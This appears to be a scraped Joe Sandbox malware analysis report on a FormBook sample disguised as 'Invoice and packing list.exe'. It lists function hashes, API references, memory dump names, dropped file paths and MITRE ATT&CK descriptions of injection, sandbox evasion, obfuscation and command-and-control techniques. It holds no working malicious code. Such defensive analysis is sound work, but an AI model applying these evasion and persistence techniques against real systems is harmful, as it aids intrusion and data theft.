Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 7a13a6c95fd5b6975f0d55c31597ef4e0a4cf12214d6c961ff5c8a3c40d29af2
Instruction ID: 089cf5935d687acc97a9a6b76862ded99f30c069a206704cac284b75ca2c93e8
Opcode Fuzzy Hash: 7a13a6c95fd5b6975f0d55c31597ef4e0a4cf12214d6c961ff5c8a3c40d29af2
Instruction Fuzzy Hash: 9B811A71D002699BDB359B54CC44BEAB7B8AF48754F1045EAEA1DB7280D7309E84CFA1

Function 018F4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018F49A4

Strings

X, xrefs: 018F49F0
0Iv, xrefs: 018F4A13
0Iv, xrefs: 018F4A03
0Iv, xrefs: 018F4A23

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$X
API String ID: 3446177414-728256981
Opcode ID: a218165f29418a45a7e7569e22dfe47b9caa19805cd7384671da5faf3f7a21f6
Instruction ID: 3b19e65f34b20855e13a8ede6d4c01884ff5dc51105bacc0da05f76a2b76add0
Opcode Fuzzy Hash: a218165f29418a45a7e7569e22dfe47b9caa19805cd7384671da5faf3f7a21f6
Instruction Fuzzy Hash: 87318D31A0420AEBCF228F58D844B8E3BB1BF84758F40405EFA14D6241E2709B58CF86

Function 018AC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018AC0B4
RtlDebugPrintTimes.NTDLL ref: 0190D623
RtlDebugPrintTimes.NTDLL ref: 0190D651

Strings

$, xrefs: 018AC07C

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: bef8ff2d81c71ae22c659f44e6470c5ec105755bbe0588a9968fbc8808e76caf
Instruction ID: 90362a063d041c497c75d162bc43fcdf7b80f8e7bb950d0bafa39895cca0fbef
Opcode Fuzzy Hash: bef8ff2d81c71ae22c659f44e6470c5ec105755bbe0588a9968fbc8808e76caf
Instruction Fuzzy Hash: 0A115E32904218EFCF16AF94EC48AAC7B71FF44765F108519F92A672D0CB316A44CB80

Function 0192EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0192EFE1
RtlDebugPrintTimes.NTDLL ref: 0192F009
RtlDebugPrintTimes.NTDLL ref: 0192F0AC
RtlDebugPrintTimes.NTDLL ref: 0192F160

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3649f9a5aa5d8681e029f7e332433e0295681613058d8fb1e15f128f50b0763e
Instruction ID: b40109c2493180fa1da2d74326df3f4a96c370f18e60dba510784075649e35bf
Opcode Fuzzy Hash: 3649f9a5aa5d8681e029f7e332433e0295681613058d8fb1e15f128f50b0763e
Instruction Fuzzy Hash: 8E711671E002299FDF05CFA8C984AEDBBF5BF49714F14402AE909FB259D734A905CBA4

Function 0192F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0192F26D
RtlDebugPrintTimes.NTDLL ref: 0192F292
RtlDebugPrintTimes.NTDLL ref: 0192F324
RtlDebugPrintTimes.NTDLL ref: 0192F378

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f06704a440e96dc16749a970c2c32425553fd9b96f183d543e27cdaf3d0c8a50
Instruction ID: c68d8f4ee580bad664beae0fc3f89029918a041dda2fa37fa7708fc271a27349
Opcode Fuzzy Hash: f06704a440e96dc16749a970c2c32425553fd9b96f183d543e27cdaf3d0c8a50
Instruction Fuzzy Hash: 1F5154B2E002299FDF09CF98D849ADCBBF5BF49355F04802AE909B7258D734A905CF54

Function 018B59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 01910AA7

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f9ed825b5882426b15f95482e7fa8ecf42d082046b41db7acdb7aa5437b622f2
Instruction ID: bcde6625bbd763a86f9c7884beb867610cbf73bde18993b9cea280394af67e03
Opcode Fuzzy Hash: f9ed825b5882426b15f95482e7fa8ecf42d082046b41db7acdb7aa5437b622f2
Instruction Fuzzy Hash: 1C324670D0426ADFDB21CF68C894BE9BBB5BB08304F1481E9D549A7341E7759B88CF91

Function 018CD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018CD3A4

Strings

Bl, xrefs: 018CD48C
l, xrefs: 018CD46B

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: b4c2cb0b3949eaf6271bb1d635def4813c2d3dc2316651908f15d2bd834f5637
Instruction ID: 63aff35497fb9c5587863ec76a9917962d091fcb73abb0a8cc2808bf403b3073
Opcode Fuzzy Hash: b4c2cb0b3949eaf6271bb1d635def4813c2d3dc2316651908f15d2bd834f5637
Instruction Fuzzy Hash: 3AA19431A003199BEB31AB98C890BA9B7B5BB45B04F0541BDD909E7241DB74EF85CBD2

Function 018DD7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018DD959

Part of subcall function 018B4859: RtlDebugPrintTimes.NTDLL ref: 018B48F7

Strings

$, xrefs: 018DD900
$, xrefs: 018DD86D

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 0ef657402761bb69392635a54fba98f2722acb369ce46f77029b07a434bef16c
Instruction ID: 994d9084294039145959f1116d67c3aa707921a0a5af91bd25266a3d00b00637
Opcode Fuzzy Hash: 0ef657402761bb69392635a54fba98f2722acb369ce46f77029b07a434bef16c
Instruction Fuzzy Hash: 5E510171E0434ADFDB25DFA8C48579DBBB2BF44308F144659C509AB2C5C775AA89CBC0

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice and packing list.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and packing list.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\utlAHqvw.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hkuw13k.xqt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sjnqsbi.4vb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgz1irpp.xtl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gam1wwvb.ncg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4lwyg0t.0ye.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thy0abgh.3hw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upntwxvc.m4b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfrkahtd.vjx.psm1

C:\Users\user\AppData\Local\Temp\tmp2498.tmp

C:\Users\user\AppData\Local\Temp\tmp36E8.tmp

Windows Analysis Report
Invoice and packing list.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre